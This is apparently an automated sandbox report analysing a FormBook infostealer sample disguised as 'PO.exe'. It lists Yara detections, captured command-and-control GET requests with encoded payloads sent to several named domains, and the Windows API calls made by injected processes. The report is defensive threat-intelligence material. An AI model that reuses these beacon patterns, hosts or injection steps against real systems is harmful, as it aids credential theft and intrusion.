Source: global traffic	HTTP traffic detected: GET /sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X HTTP/1.1Host: www.wwwflixxy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw HTTP/1.1Host: www.adanahabernet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi HTTP/1.1Host: www.sidepiecebags.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X HTTP/1.1Host: www.mitraberdaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 81.17.18.197 81.17.18.197

Source: Joe Sandbox View	ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View	ASN Name: ASRSINETRU ASRSINETRU
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: C:\Windows\explorer.exe

Code function: 15_2_04DCC302 getaddrinfo,setsockopt,recv,

15_2_04DCC302

Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ HTTP/1.1Host: www.marienish.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X HTTP/1.1Host: www.wwwflixxy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw HTTP/1.1Host: www.adanahabernet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi HTTP/1.1Host: www.sidepiecebags.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X HTTP/1.1Host: www.mitraberdaya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.marienish.com

Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp	String found in binary or memory: http://ns.d
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: PO.exe, 00000000.00000002.753579067.0000000002AB0000.00000004.00000001.sdmp, PO.exe, 00000000.00000002.753609790.0000000002AC7000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: PO.exe, 00000000.00000002.753550210.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000F.00000000.754393079.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: PO.exe, 00000000.00000002.753550210.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: PO.exe, 00000000.00000002.753550210.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/
Source: wlanext.exe, 00000011.00000002.910661249.00000000033E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.sidepiecebags.com/sawc?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN

Source: C:\Windows\explorer.exe

Code function: 15_2_04DC5EB2 OpenClipboard,

15_2_04DC5EB2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.792786425.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.793241716.0000000001550000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.760068080.0000000003C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.909160222.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.793449385.00000000018D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.759556718.0000000003B47000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.759427914.0000000003AFC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large array initializations

Show sources

Source: PO.exe, Bq61/f1Y5.cs	Large array initialization: .cctor: array initializer size 4776
Source: 0.0.PO.exe.590000.0.unpack, Bq61/f1Y5.cs	Large array initialization: .cctor: array initializer size 4776
Source: 0.2.PO.exe.590000.0.unpack, Bq61/f1Y5.cs	Large array initialization: .cctor: array initializer size 4776

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004181D0 NtCreateFile,	11_2_004181D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00418280 NtReadFile,	11_2_00418280
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00418300 NtClose,	11_2_00418300
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004183B0 NtAllocateVirtualMemory,	11_2_004183B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004181CA NtCreateFile,	11_2_004181CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041827A NtReadFile,	11_2_0041827A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004182CA NtClose,	11_2_004182CA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004183AA NtAllocateVirtualMemory,	11_2_004183AA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B799A0 NtCreateSection,LdrInitializeThunk,	11_2_01B799A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_01B79910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B798F0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_01B798F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_01B79860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79840 NtDelayExecution,LdrInitializeThunk,	11_2_01B79840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79A20 NtResumeThread,LdrInitializeThunk,	11_2_01B79A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79A00 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_01B79A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79A50 NtCreateFile,LdrInitializeThunk,	11_2_01B79A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B795D0 NtClose,LdrInitializeThunk,	11_2_01B795D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79540 NtReadFile,LdrInitializeThunk,	11_2_01B79540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B797A0 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_01B797A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79780 NtMapViewOfSection,LdrInitializeThunk,	11_2_01B79780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79FE0 NtCreateMutant,LdrInitializeThunk,	11_2_01B79FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79710 NtQueryInformationToken,LdrInitializeThunk,	11_2_01B79710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B796E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_01B796E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_01B79660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B799D0 NtCreateProcessEx,	11_2_01B799D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79950 NtQueueApcThread,	11_2_01B79950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B798A0 NtWriteVirtualMemory,	11_2_01B798A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79820 NtEnumerateKey,	11_2_01B79820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7B040 NtSuspendThread,	11_2_01B7B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7A3B0 NtGetContextThread,	11_2_01B7A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79B00 NtSetValueKey,	11_2_01B79B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79A80 NtOpenDirectoryObject,	11_2_01B79A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79A10 NtQuerySection,	11_2_01B79A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B795F0 NtQueryInformationFile,	11_2_01B795F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7AD30 NtSetContextThread,	11_2_01B7AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79520 NtWaitForSingleObject,	11_2_01B79520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79560 NtWriteFile,	11_2_01B79560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79730 NtQueryVirtualMemory,	11_2_01B79730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7A710 NtOpenProcessToken,	11_2_01B7A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B7A770 NtOpenThread,	11_2_01B7A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79770 NtSetInformationFile,	11_2_01B79770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79760 NtOpenProcess,	11_2_01B79760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B796D0 NtCreateKey,	11_2_01B796D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79610 NtEnumerateValueKey,	11_2_01B79610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79670 NtQueryInformationProcess,	11_2_01B79670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B79650 NtQueryValueKey,	11_2_01B79650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99A50 NtCreateFile,LdrInitializeThunk,	17_2_02D99A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99840 NtDelayExecution,LdrInitializeThunk,	17_2_02D99840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_02D99860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D999A0 NtCreateSection,LdrInitializeThunk,	17_2_02D999A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_02D99910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D996D0 NtCreateKey,LdrInitializeThunk,	17_2_02D996D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D996E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_02D996E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99650 NtQueryValueKey,LdrInitializeThunk,	17_2_02D99650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_02D99660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99FE0 NtCreateMutant,LdrInitializeThunk,	17_2_02D99FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99780 NtMapViewOfSection,LdrInitializeThunk,	17_2_02D99780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99710 NtQueryInformationToken,LdrInitializeThunk,	17_2_02D99710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D995D0 NtClose,LdrInitializeThunk,	17_2_02D995D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99540 NtReadFile,LdrInitializeThunk,	17_2_02D99540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99A80 NtOpenDirectoryObject,	17_2_02D99A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99A10 NtQuerySection,	17_2_02D99A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99A00 NtProtectVirtualMemory,	17_2_02D99A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99A20 NtResumeThread,	17_2_02D99A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9A3B0 NtGetContextThread,	17_2_02D9A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99B00 NtSetValueKey,	17_2_02D99B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D998F0 NtReadVirtualMemory,	17_2_02D998F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D998A0 NtWriteVirtualMemory,	17_2_02D998A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9B040 NtSuspendThread,	17_2_02D9B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99820 NtEnumerateKey,	17_2_02D99820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D999D0 NtCreateProcessEx,	17_2_02D999D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99950 NtQueueApcThread,	17_2_02D99950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99670 NtQueryInformationProcess,	17_2_02D99670
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99610 NtEnumerateValueKey,	17_2_02D99610
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D997A0 NtUnmapViewOfSection,	17_2_02D997A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9A770 NtOpenThread,	17_2_02D9A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99770 NtSetInformationFile,	17_2_02D99770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99760 NtOpenProcess,	17_2_02D99760
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9A710 NtOpenProcessToken,	17_2_02D9A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99730 NtQueryVirtualMemory,	17_2_02D99730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D995F0 NtQueryInformationFile,	17_2_02D995F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99560 NtWriteFile,	17_2_02D99560
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9AD30 NtSetContextThread,	17_2_02D9AD30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D99520 NtWaitForSingleObject,	17_2_02D99520
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02848280 NtReadFile,	17_2_02848280
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_028483B0 NtAllocateVirtualMemory,	17_2_028483B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02848300 NtClose,	17_2_02848300
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_028481D0 NtCreateFile,	17_2_028481D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_028482CA NtClose,	17_2_028482CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_0284827A NtReadFile,	17_2_0284827A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_028483AA NtAllocateVirtualMemory,	17_2_028483AA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_028481CA NtCreateFile,	17_2_028481CA

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_0280FBF8 CreateProcessAsUserW,

0_2_0280FBF8

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_0280D690	0_2_0280D690
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC6018	0_2_05AC6018
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC0040	0_2_05AC0040
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC7B98	0_2_05AC7B98
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05ACE5E0	0_2_05ACE5E0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05ACE5F0	0_2_05ACE5F0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC8428	0_2_05AC8428
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC8438	0_2_05AC8438
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05ACE030	0_2_05ACE030
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC6008	0_2_05AC6008
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05ACE040	0_2_05ACE040
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_05AC2228	0_2_05AC2228
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0040102E	11_2_0040102E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B89A	11_2_0041B89A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C46E	11_2_0041C46E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00408C70	11_2_00408C70
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041C4F0	11_2_0041C4F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B4A9	11_2_0041B4A9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041B4B6	11_2_0041B4B6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00402D88	11_2_00402D88
